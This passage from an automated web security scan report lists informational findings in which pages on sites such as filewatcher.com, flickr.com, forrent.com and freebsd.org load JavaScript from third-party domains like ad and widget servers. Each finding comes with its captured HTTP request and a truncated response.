Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1056. http://www.filewatcher.com/p/aub-2.1.3.tar.gz.55334.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.1.3.tar.gz.55334.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.1.3.tar.gz.55334.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RvGBe/5JbVDbjE9OCRQNcw"
Content-Length: 5570
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.1.3.tar.gz/ - Package Brow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1057. http://www.filewatcher.com/p/aub-2.2.tbz.41730.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41730.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41730.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CiXuTRMgXbGRfiH7Kvql9w"
Content-Length: 5503
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1058. http://www.filewatcher.com/p/aub-2.2.tbz.41785.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41785.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41785.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:58 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3aLHnuwucz1U5Ay2R3eXBA"
Content-Length: 5503
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1059. http://www.filewatcher.com/p/aub-2.2.tbz.41893.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41893.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41893.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "q1SsWjQU1P3TEtddVjBP4g"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1060. http://www.filewatcher.com/p/aub-2.2.tbz.41895.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41895.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41895.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "eJ18R8p2KAQ4cEsdHKGq/A"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1061. http://www.filewatcher.com/p/aub-2.2.tbz.41897.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41897.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41897.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wZEAWzQgeQONmOhwcRss9A"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1062. http://www.filewatcher.com/p/aub-2.2.tbz.41898.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41898.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41898.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "gg+WbshypNgdxsnAva7j8A"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1063. http://www.filewatcher.com/p/aub-2.2.tbz.41904.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41904.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41904.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "qJFu1clJIFjt0hKz36+sTg"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 805
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1064. http://www.filewatcher.com/p/aub-2.2.tbz.41906.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41906.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41906.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Z8nT/Y8XDg+vjVs93R7Xow"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1065. http://www.filewatcher.com/p/aub-2.2.tbz.41911.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41911.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41911.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "p4MIKwKd+L5/T8oXDR2fQw"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1066. http://www.filewatcher.com/p/aub-2.2.tbz.41917.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41917.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41917.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IaYVCAtfcBaOmk/4vV5t8g"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1067. http://www.filewatcher.com/p/aub-2.2.tbz.41941.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.2.tbz.41941.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41941.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "KSJHlcCSiEfbvLb+jkEJJQ"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1068. http://www.flickr.com/photos/aubalumni/4688630122/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/aubalumni/4688630122/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17
http://l.yimg.com/g/javascript/global.js.v93276.17
http://l.yimg.com/g/javascript/s_output_en-us.js.e02f3c9e0daa4639d1f9c385d44d3918
http://us.adserver.yahoo.com/a?f=792600122&p=flickr&l=FOOT9&c=r

Request

GET /photos/aubalumni/4688630122/x22 HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:16:26 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=cvj761d6jr9eq&b=3&s=q9; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Thu, 23-Jan-2014 16:16:26 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
X-Served-By: www121.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Page Not Found</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.17"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.e02f3c9e0daa4639d1f9c385d44d3918"></script>
...[SNIP]...
</div>

   <script src="http://us.adserver.yahoo.com/a?f=792600122&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...

21.1069. http://www.flickr.com/photos/favoritltd/4795390303/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795390303/

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

Response

21.1070. http://www.flickr.com/photos/favoritltd/4795390991/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795390991/

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

Response

21.1071. http://www.flickr.com/photos/favoritltd/4795392149/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795392149/

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

Response

21.1072. http://www.flickr.com/photos/favoritltd/4795392811/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795392811/

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

Response

21.1073. http://www.flickr.com/photos/favoritltd/4796022554/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4796022554/

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

Response

21.1074. http://www.flickr.com/photos/favoritltd/4796024690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4796024690/

Issue detail

The response dynamically includes the following script from another domain:

http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

Response

21.1075. http://www.fontsquirrel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fontsquirrel.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET / HTTP/1.1
Host: www.fontsquirrel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:16:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 20353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<!--
w
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

21.1076. http://www.forrent.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.forrent.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=forrent
http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js
http://video.bettervideo.com/videos/player/ForRent/mds.js

Request

GET / HTTP/1.1
Host: www.forrent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=8ct7fdk873duftnhmjoh7oems5; path=/, test_element_id=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: test_element_id=0; expires=Mon, 25-Apr-2011 00:02:36 GMT; path=/
X-Server-Id: W2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 52497


<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head dir="ltr" lang="en-us" profile="http://purl.org/uF/2008/03/ http://purl.org/uF/hCard/1.0/ http://gmpg.org/xfn/11">
   <meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=forrent"></script>
...[SNIP]...
<div id="playerNode" class="homeVideo balance" onmousedown="javascript: if (playerWasClicked == false) { write_event('CommunitySpotlight_Click',14,'commspot'); playerWasClicked = true;}">
                   <script src="http://video.bettervideo.com/videos/player/ForRent/mds.js" clientId="7" videoId="loc1297009577" locationId="0" config="page_type_id=mainMap&siteID=loc1297009577"></script>
...[SNIP]...

<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.1077. http://www.freebsd.org/community.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/community.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/uds/api?file=uds.js&v=1.0&source=uds-vbw
http://www.google.com/uds/solutions/videobar/gsvideobar.js?mode=new

Request

GET /community.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "3339736707"
Last-Modified: Sun, 02 Jan 2011 00:10:42 GMT
Content-Length: 8631
Connection: close
Date: Mon, 24 Jan 2011 16:39:35 GMT
Server: httpd/1.4.x LaHonda

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:cvs="http://www.Fr
...[SNIP]...
</div>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&source=uds-vbw"
type="text/javascript">
</script>
...[SNIP]...
</script>

<script src="http://www.google.com/uds/solutions/videobar/gsvideobar.js?mode=new"
type="text/javascript">
</script>
...[SNIP]...

21.1078. http://www.freebsdfoundation.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsdfoundation.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.statcounter.com/counter/counter.js

Request

GET / HTTP/1.1
Host: www.freebsdfoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:39 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
